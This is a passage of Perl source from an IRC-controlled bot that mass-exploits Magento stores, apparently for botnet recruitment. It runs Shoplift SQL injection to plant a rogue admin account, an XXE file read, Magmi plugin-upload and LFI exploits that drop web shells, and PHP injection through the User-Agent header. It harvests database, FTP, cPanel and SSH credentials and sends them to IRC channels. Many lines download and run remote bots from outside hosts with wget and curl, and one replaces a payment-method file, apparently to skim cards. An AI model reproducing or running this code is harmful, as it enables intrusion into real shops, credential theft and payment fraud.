/<frontName><!\[CDATA\[(.*)\]\]\><\/frontName>/){$dir=$1;} if ($hash =~ /<table_prefix><!\[CDATA\[(.*)\]\]\><\/table_prefix>/){$prefix=$1;} my $injek2 = "http://".$site.$dir."/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VyX2lkID0gMzU7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDM1OyAgSU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRgLCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgYGV4dHJhYCkgVkFMVUVTICAoMzUsJ3N5c3RlbV9iYWNrdXAnLCAnbWFnZW50bycsICdzeXN0ZW1fYmFja3VwQGdtYWlsLmNvbScsICdzeXN0ZW1fYmFja3VwJywgJzlkNzI5ZTU5MTM1NzJlYzZmMTJlNmZiN2JmMjRkMGM3Om1nJywgJ251bGwnLCAnbnVsbCcsICdudWxsJywgMSwgMCwgMSwgJ047Jyk7ICBJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLCBgdHJlZV9sZXZlbGAsIGBzb3J0X29yZGVyYCwgYHJvbGVfdHlwZWAsIGB1c2VyX2lkYCwgYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwgMiwgMCwgJ1UnLCAzNSwgJ3N5c3RlbV9iYWNrdXAnKTs7IC0tIA=="; my $fz = &get_content($injek2); my $url = "http://".$site."/admin"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "system_backup"; my $password = "123456"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = $response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![7SHOPLIFT]!".$url." 4<9=4> 8 File_System = $fs & Downloader = $out ![6*]!"); &msg("$channel","![7X]! [9success11]12 Balance11 [3 ".$price." 11] ![5*]!"); } } } my $execute2 = &get_content($injek2); #&chkdownload($site,$dir,$chan,$engine); } my $testa = "http://www.globalrelax.it//wp-admin/includes/tmpx/conf.php?target=http://".$site."/"; my $htmla = &get_content($testa); if ($htmla =~ /is vulnerable/) { my $xteam = "http://".$site."/cloud.php"; my $oscheck = &get_content($xteam."?silk"); if ($oscheck =~ m/Touched By Silk/ig) { if ($oscheck =~ /Uname : (.*?)<\/b>/){$os=$1;} &msg("$channel","![7$engine]! [ 9 success 15 Uname:$os ]");sleep(2); &msg("$admin","$logo7,1[11#8 $engine 11#7]8,1 Shell 9 http://".$site."/cloud.php?silk 15 (Uname:$os) ");sleep(2); } } } } } } sub xxe_query() { my $jembut = $_[0]; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $b = "<?xml version=\"1.0\"?>"; $b .= "<!DOCTYPE foo [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM \"php://filter/read=convert.base64-encode/resource=app/etc/local.xml\"> ]>"; $b .= "<methodCall><methodName>&xxe;</methodName></methodCall>"; my $response = $userAgent->request(POST $jembut , Content_Type => 'text/xml', Content => $b); return $response->content; } sub chkdownload { my $site = $_[0]; my $dirr = $_[1]; my $chan = $_[2]; my $engine = $_[3]; my $website = "http://".$site."downloader/"; my $wbst = "http://".$site."downloader/index.php?A=settings"; my $check = &get_content($website); if ($check =~ /Magento Downloader/) { my ($useragent,$request,$response,%form); undef %form; $form{username} = "system_backup"; $form{password} = "123456"; $useragent = LWP::UserAgent->new(agent => $uagent); $useragent->timeout(10); $request = POST $website,\%form; $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ /Upload package file/ ) { &get_content("".$magelog."?x=-LOGIN- http://".$site."index.php/".$dirr."/ - Login Success"); &msg("$admin","7,1[11#8 $engine 11#7][11#8 Shoplift 11#7] 15http://".$site."index.php/".$dirr."/ 7[11#9Login Sukses 11#0)"); &msg("$channel","![7$engine]! [8 Login Success9 Execute ]"); &msg("$admin","11,1(7@7$engine11)(8@7Login11) 7http://".$site."downloader/ 0(7@15CEK WRITABLE0)"); } if ($res =~ /Warning: (.*)<\/h4/ ) { if ($res =~ /Warning: (.*)<\/h4/ ) {$warn=$1;} &get_content("".$magelog."?x=-LOGIN- http://".$site."index.php/".$dirr."/ - $warn"); &msg("$admin","7,1[11#8 $engine 11#7][11#9 Shoplift 11#7] 15http://".$site."index.php/".$dirr."/ 0(11#8 $warn 11#)"); &msg("$chanxxx","7,1[11#8 $engine 11#7][11#15 Login 11#7] 15http://".$site.$dirr."/ 11-=- 8,1$warn");} } }} sub magmi_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $action = "http://".$site."magmi/web/magmi.php"; my $update_file = "magnum.zip"; my $exploit = $ua->post("$url", Content_Type => "multipart/form-data", Content => [action => "$action", plugin_package => ["$update_file"]]); my $status = $exploit->as_string; my $check = &get_content("http://".$site."magmi/plugins/magnum/up.php"); my $botf = &get_content("http://".$site."magmi/plugins/magnum/up.php?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/doc.txt%20;%20perl%20doc.txt%20;wget%20www.rocablocks.com/flickr.com/pl.php%20;%20php%20pl.php%20;%20rm%20-rf%20bot.log*"); my $nanang = &get_content("http://".$site."magmi/plugins/editor10/up.php?220=cd%20..;cd%20..;cd%20..;cd%20app/code/core/Mage/Payment/Model/Method/;rm%20-rf%20Cc.php;wget%20https://pastebin.com/38m7XjKG%20;-O%20Cc.php;clear"); if ($check =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid=""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [13 $nick dapat pahala shell Selamatt Yaaa... ^_^ 4<9=".$os."4> ]"); &msg("$channel","![7$engine]! [ 4Backdoored !15 (SafeMode=$safe) (OS=$os) $uid ]");sleep(2); &msg("$admin","$mglogo(4@3$engine15)15(4@13SHeLL115)4 http://".$site."magmi/plugins/magnum/up.php 9(4@15anaL!9) ");sleep(2); #&msg("$chan2","$mglogo(4@3$engine15)15(4@13SHeLL115)4 http://".$site."magmi/plugins/racrew.php 15 (SafeMode=$safe) (OS=$os) $uid ");sleep(2); &msg("$channel","7Mencoba membuat bot php... ");sleep(2); } } sub magmi2_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $action = "http://".$site."magmi/web/plugin_upload.php"; my $update_file = "magnum.zip"; my $exploit = $ua->post("$url", Content_Type => "multipart/form-data", Content => [action => "$action", plugin_package => ["$update_file"]]); my $status = $exploit->as_string; my $check = &get_content("http://".$site."magmi/plugins/magnum/up.php"); my $botf = &get_content("http://".$site."magmi/plugins/magnum/up.php?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/doc.txt%20;%20perl%20doc.txt%20;wget%20www.rocablocks.com/flickr.com/pl.php%20;%20php%20pl.php%20;%20rm%20-rf%20bot.log*"); if ($check =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid=""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [13 $nick dapat pahala shell Selamatt Yaaa... ^_^ 4<9=".$os."4> ]"); &msg("$channel","![7$engine]! [ 4Backdoored !15 (SafeMode=$safe) (OS=$os) $uid ]");sleep(2); &msg("$admin","$mglogo(4@3$engine15)15(4@13SHeLL115)4 http://".$site."magmi/plugins/magnum/up.php 9(4@15anaL!9) ");sleep(2); &msg("$channel","7Mencoba membuat bot php... ");sleep(2); } } sub magmi3_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $action = "http://".$site."magmi/web/magmi.php"; my $update_file = "magnum.zip"; my $exploit = $ua->post("$url", Content_Type => "multipart/form-data", Content => [action => "$action", plugin_package => ["$update_file"]]); my $status = $exploit->as_string; my $check = &get_content("http://".$site."magmi/plugins/magnum/up.php"); my $botf = &get_content("http://".$site."magmi/plugins/magnum/up.php?220=cd%20/tmp%20;wget%20http://46.21.104.38/dompdf/c.txt%20;%20perl%20c.txt%20;wget%20http://46.21.104.38/dompdf/ec.txt%20;%20php%20ec.txt%20;%20rm%20-rf%20bot.log*"); my $botf = &get_content("http://".$site."magmi/plugins/magnum/up.php?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/doc.txt%20;%20perl%20doc.txt%20;wget%20www.rocablocks.com/flickr.com/pl.php%20;%20php%20pl.php%20;%20rm%20-rf%20bot.log*"); if ($check =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid=""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [13 $nick dapat pahala shell Selamatt Yaaa... ^_^ 4<9=".$os."4> ]"); &msg("$channel","![7$engine]! [ 4Backdoored !15 (SafeMode=$safe) (OS=$os) $uid ]");sleep(2); &msg("$admin","$mglogo(4@3$engine15)15(4@13SHeLL115)4 http://".$site."magmi/plugins/racrew.php 9(4@15anaL!9) ");sleep(2); &msg("$chan2","$mglogo(4@3$engine15)15(4@13SHeLL115)4 http://".$site."magmi/plugins/racrew.php 15 (SafeMode=$safe) (OS=$os) $uid ");sleep(2); &msg("$channel","7Mencoba membuat bot php... ");sleep(2); } } sub magmi4_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $action = "http://".$site."magmi/web/plugin_upload.php"; my $update_file = "magnum.zip"; my $exploit = $ua->post("$url", Content_Type => "multipart/form-data", Content => [action => "$action", plugin_package => ["$update_file"]]); my $status = $exploit->as_string; my $check = &get_content("http://".$site."magmi/plugins/magnum/up.php"); #my $botf = &get_content("http://".$site."magmi/plugins/magnum/up.php?220=cd%20/tmp%20;wget%20http://46.21.104.38/dompdf/c.txt%20;%20perl%20c.txt%20;wget%20http://46.21.104.38/dompdf/ec.txt%20;%20php%20ec.txt%20;%20rm%20-rf%20bot.log*"); my $botf = &get_content("http://".$site."magmi/plugins/magnum/up.php?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/doc.txt%20;%20perl%20doc.txt%20;wget%20www.rocablocks.com/flickr.com/pl.php%20;%20php%20pl.php%20;%20rm%20-rf%20bot.log*"); if ($check =~ /GIF89a/) { my $safe = ""; my $os = ""; my $safe = ""; my $os = ""; my $uid=""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [13 $nick dapat pahala shell Selamatt Yaaa... ^_^ 4<9=".$os."4> ]"); &msg("$channel","![7$engine]! [ 4Backdoored !15 (SafeMode=$safe) (OS=$os) $uid ]");sleep(2); &msg("$admin","$mglogo(4@3$engine15)15(4@13SHeLL115)4 http://".$site."magmi/plugins/editor10/up.php 9(4@anaL!19) ");sleep(2); &msg("$channel","7Mencoba membuat bot php... ");sleep(2); } } sub magmi5_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $action = "http://".$site."/magmi/web/download_file.php?file=../../app/etc/local.xml"; my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => $action); my $html = $ua->request($req)->content; #my $html = &get_content($action); if ($html =~ /dbname/i) { my $serverIP =""; if ($html =~ /<host><!\[\[CDATA\[(.*)\]\]\><\/host>/) {$serverIP=$1;} if ($html =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/){$user=$1;} if ($html =~ /<password><!\[CDATA\[(.*)\]\]\><\/password>/){$pass=$1;} if ($html =~ /<dbname><!\[CDATA\[(.*)\]\]\><\/dbname>/){$dbname=$1;} if ($html =~ /<frontName><!\[CDATA\[(.*)\]\]\><\/frontName>/){$logadmin=$1;} if ($html =~ /<key><!\[CDATA\[(.*)\]\]\><\/key>/){$key=$1;} &msg("$chanxxx","4http://".$site." 9[+]hostname: 4".$serverIP."9 [+]username: 4".$user." 9[+]password: 4".$pass." 9[+]dbname: 4".$dbname." 9[+]Login : 4".$logadmin." 9[+]key : 4".$key."9");sleep(2); &mageAuth($site, $serverIP, $user, $pass, $dbname); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $serverIP, $user, $pass, $dbname); &dbConnect($site, $serverIP, $user, $pass, $dbname); } my $asu = "http://".$site."/phpmyadmin"; my $jembuts = &get_content($asu); if ($jembuts =~ /<title>phpMyAdmin/){ &msg("$admin","Phpmyadmin : 9http://".$site." 9[+]hostname: 9".$serverIP."9 [+]username: 9".$user." 9[+]password: 9".$pass." 9[+]dbname: 9".$dbname." Login : ".$logadmin."");sleep(2); &msg("$channel","Phpmyadmin : 9Success");sleep(2); } if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass."");sleep(2); #&msg("$chanxxx","12[+]4$engine 12FTP[+]Success send To Admin"); } if ($ftplog2 =~ /ftp/) { &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass."");sleep(2); #&msg("$chanxxx","12[+]$mg2logo4$engine 12FTP[+]Success send To Admin"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($site,$host,$user,$pass,$dbname,$chanxxx,$engine,$mglogo);sleep(2); &ftp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &cp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); if ($user =~ /_/) { @users = split("_",$user); $user = $users[0]; &ftp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo); sleep(2); &dbi_connect($site,$host,$user,$pass,$dbname,$chanxxx,$engine,$mglogo);sleep(2); &cp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); } } } } sub magmi6_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $bug ='/magmi/web/ajax_pluginconf.php?plugintype=utilities&pluginclass=CustomSQLUtility&file='; my @dirc = ("../../../../../../../../../../../../../../../../../../../../", "../../../../../../../../../../../../../../../../../../../", "../../../../../../../../../../../../../../../../../../", "../../../../../../../../../../../../../../../../../", "../../../../../../../../../../../../../../../../", "../../../../../../../../../../../../../../../", "../../../../../../../../../../../../../../", "../../../../../../../../../../../../../../", "../../../../../../../../../../../../../", "../../../../../../../../../../../../", "../../../../../../../../../../../", "../../../../../../../../../../", "../../../../../../../../../", "../../../../../../../../", "../../../../../../../", "../../../../../../", "../../../../../", "../../../../", "../../../", "../../", "../"); my $dir = $dirc[rand(scalar(@dirc))]; my $test = "http://".$site.$bug.$dir."/proc/self/environ"; my $vuln = "http://".$site.$bug.$dir."/etc/passwd"; my $shell = "http://".$site.$bug.$dir."/tmp/koboy"; my $shell2 = "http://".$site.$bug.$dir."/tmp/anal"; my $html = &get_content($test); if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$gento.'","/tmp/koboy")){ echo "SUCCESS";@copy("'.$gento2.'","/tmp/dev");@copy("'.$gento.'","/tmp/anal"); }'; my $res = lfi_env_query($test,encode_base64($code)); &lfi_spread_query($test); &get_content("http://".$site.$bug.$dir."/tmp/dev"); &get_content("http://".$site.$bug.$dir."/tmp/anal"); $res =~ s/\n//g; if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) { my $sys = $1; $nob0dy = $2; &msg("$channel","$mglogo 13 Selamatt Yaaa... ^_^ 4<9=".$sys."4>"); # &msg("$chan2","4(4@3$engine4)15(4@9SHeLL4)13 ".$shell." or ".$shell2." 15(4@3".$sys."15)15(4@9anaL! shell uploaded15)");sleep(2); &msg("$admin","4(4@3$engine4)15(4@9SHeLL4)13 ".$shell." or ".$shell2." 15(4@3".$sys."15)15(4@9anaL! shell uploaded15)");sleep(2); } elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; $nob0dy = $2; my $upload = 'system("killall -9 perl;killall -9 php;wget http://djcaa.org/doc.txt;fetch http://djcaa.org/doc.txt;perl doc.txt; perl doc.txt.1;wget http://wordpress.com.orbitadventuretours.com/info.php;fetch http://wordpress.com.orbitadventuretours.com/info.php;wget http://wordpress.com.orbitadventuretours.com/info.php -O cok.php;fetch http://wordpress.com.orbitadventuretours.com/info.php;mv info.php toolsb0x.php;");passthru("killall -9 perl;killall -9 php;wget '.$gento.' -O images.php;fetch '.$gento.';mv b.txt images2.php;");'; my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2); my $check = &get_content("http://".$site.$bug.$dir."/tmp/koboy"); sleep(2); &get_content("http://".$site.$bug.$dir."/tmp/dev");sleep(2); &get_content("http://".$site.$bug.$dir."/tmp/anal");sleep(2); if ($check =~ m/404 Not Found/ig) { &msg("$channel","$mglogo13$nick Selamatt Yaaa... ^_^ 4<9=".$sys."4>"); &msg("$chan2","4(4@3$engine4)15(4@9SHeLL4)13 ".$shell." or ".$shell2." 15(4@3".$sys."15)15(4@9anaL! shell uploaded15)");sleep(2); &msg("$admin","4(4@3$engine4)15(4@9SHeLL4)13 ".$shell." or ".$shell2."15(4@3".$sys."15)15(4@9anaL! shell uploaded15)");sleep(2); &msg("$channel","7Mencoba membuat bot php... ");sleep(2); } else { &msg("$channel","4(4@3$engine4)15(4@9SysTem4)7 ".$vuln." 15(4@3".$sys."15))15(4@9anaL! shell uploaded15)");sleep(2); } } exit; } } else { &msg("$channel","4(4@3$engine4)4(4@9EnviRon4)6 ".$vuln." 3 ".$sys); } } exit; } sleep(2); } } sub lfi_env_query() { my $url = $_[0]; my $code = $_[1]; my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>"); $ua->timeout(7); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } sub lfi_spread_query() { my $url = $_[0]; my $code = "system('cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$spread.";php spread.txt;rm -rf melan.jpg;wget ".$botxx.";perl bot.log;rm -rf melan.jpg; curl www.rocablocks.com/flickr.com/doc.txt -O load.txt;perl load.txt;wget http://wordpress.com.fce-eth.org/doc.txt;perl doc.txt;lwp-download ".$jem.";perl lula.txt;rm-rf lula.txt;fetch ".$botshell2.";php ec.txt;rm -rf ec.txt;wget ".$botshell2.";php ec.txt;rm -rf ec.txt;curl -O ".$botshell2.";php ec.txt;rm -rf ec.txt;lwp-download ".$botshell2.";php ec.txt;cd /var/tmp;fetch ".$botshell.";php melan.jpg;rm -rf melan.jpg;wget ".$botshell.";php melan.jpg;rm -rf melan.jpg;curl -O ".$botshell.";php melan.jpg;rm -rf melan.jpg;lwp-download ".$botshell.";php melan.jpg;fetch ".$botshell2.";php ec.txt;rm -rf ec.txt;wget ".$botshell2.";php ec.txt;rm -rf ec.txt;curl -O ".$botshell2.";php ec.txt;rm -rf ec.txt;lwp-download ".$botshell2.";php ec.txt;rm -rf *.txt*;');"; my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>"); $ua->timeout(7); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); } sub magmi_sql() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $html = &get_content($url); if ($html =~ /DB Name:<\/li>/i) { my $serverIP =""; if ($html =~ /host" value="(.*)" ><\/input>/) {$serverIP=$1;} if ($html =~ /user" value="(.*)" ><\/input>/){$user=$1;} if ($html =~ /password" value="(.*)" ><\/input>/){$pass=$1;} if ($html =~ /dbname" value="(.*)" ><\/input>/){$dbname=$1;} if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} &mageAuth($site, $serverIP, $user, $pass, $dbname); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $serverIP, $user, $pass, $dbname); &dbConnect($site, $serverIP, $user, $pass, $dbname); } my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$channel","13$nick dapat colokan FtP Selamatt Yaaa... ^_^ 4<9=".$os."4>"); #&msg("$chanxxx","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); } if ($ftplog2 =~ /ftp/) { &msg("$channel","13$nick dapat colokan FtP Selamatt Yaaa... ^_^ 4<9=".$os."4>"); #&msg("$chanxxx","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($site,$host,$user,$pass,$dbname,$chanxxx,$engine,$mglogo);sleep(2); &ftp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &cp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); if ($user =~ /_/) { @users = split("_",$user); $user = $users[0]; &ftp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo); sleep(2); &dbi_connect($site,$host,$user,$pass,$dbname,$chanxxx,$engine,$mglogo);sleep(2); &cp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); } } } } sub magmi7_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $action = "http://".$site."/magmi/web/download_file.php?file=../../../.my.cnf"; my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => $action); my $html = $ua->request($req)->content; if ($html =~ /user/i) { if ($html =~ m/user=(.*?)/g){$user=$1;} if ($html =~ m/password=(.*?)/g){$pass=$1;} &msg("$channel","![3X]! [13 Checking cPanel... ^_^ ]"); &msg("$admin","13 $action "); &mageAuth($site, $user, $pass); &mageDown($site); if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];} my $ceklog = "ftp://".$usr.":".$pass."@".$site.""; my $ceklog2 = "ftp://".$user.":".$pass."@".$site.""; my $ftplog = &get_content($ceklog); my $ftplog2 = &get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$channel","13$nick dapat Cpanel / FtP dari celah *.jancok file, Selamatt Yaaa... ^_^ 4<9=".$os."4>"); #&msg("$chan2","12[+]$mglogo4$engine 12Cpanel / FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$admin","12[+]$mglogo4$engine 12Cpanel / FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$nick","12[+]$mglogo4$engine 12Cpanel / FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); } if ($ftplog2 =~ /ftp/) { &msg("$channel","13$nick dapat Cpanel / FtP dari celah *.jancok file, Selamatt Yaaa... ^_^ 4<9=".$os."4>"); #&msg("$chan2","12[+]$mglogo4$engine 12Cpanel / FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$admin","12[+]$mglogo4$engine 12Cpanel / FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$nick","12[+]$mglogo4$engine 12Cpanel / FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass.""); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); if ($user =~ /_/) { @users = split("_",$user); $user = $users[0]; &ftp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo); sleep(2); &cp_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); &ssh_connect2($site,$host,$user,$pass,$chanxxx,$engine,$mglogo);sleep(2); } } } } sub magmi8_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $user = $_[4]; my $pass = $_[5]; my $count = 0; my $actionx = "http://".$site."/downloader/connect.cfg"; my $action = &get_content($actionx); #my $action = "http://".$site."/magmi/web/download_file.php?file=../../downloader/connect.cfg"; my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => $action); my $html = $ua->request($req)->content; #my $html = &get_content($action); if ($html =~ /ftp/i) { my $serverIP =""; if ($html =~ /"ftp:\/\/(.*)"/){$ftp=$1;} if ($html =~ /"user:\/\/(.*)"/){$user=$1;} if ($html =~ /"pass:\/\/(.*)"/){$pass=$1;} &msg("$channel","13Dapat FtP dari pintu LFD, Selamatt Yaaa... ^_^ 4<9=".$ftp."4>"); #&msg("$chanxxx","FTP 9http://".$site." [+] Log FTP: 9 Checking");sleep(2); &msg("$admin","FTP 9http://".$site." [+] Log FTP: 9".$ftp." <=> ".$user." : ".$pass." ");sleep(2); } } sub download_xpl() { my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $test = "http://".$site."index.php/admin"; my $testx = "http://".$site."app/etc/local.xml"; my $tostx = "http://".$site."api/xmlrpc"; my $tastx = "http://".$site."index.php/api/xmlrpc"; my $magmo = "http://".$site."magmi/web/download_file.php?file=../conf/magmi.ini"; my $magme = "http://".$site."magmi/web/download_file.php?file=../../app/etc/local.xml"; my $magma = "http://".$site."web/download_file.php?file=../conf/magmi.ini"; my $cmswy0 = 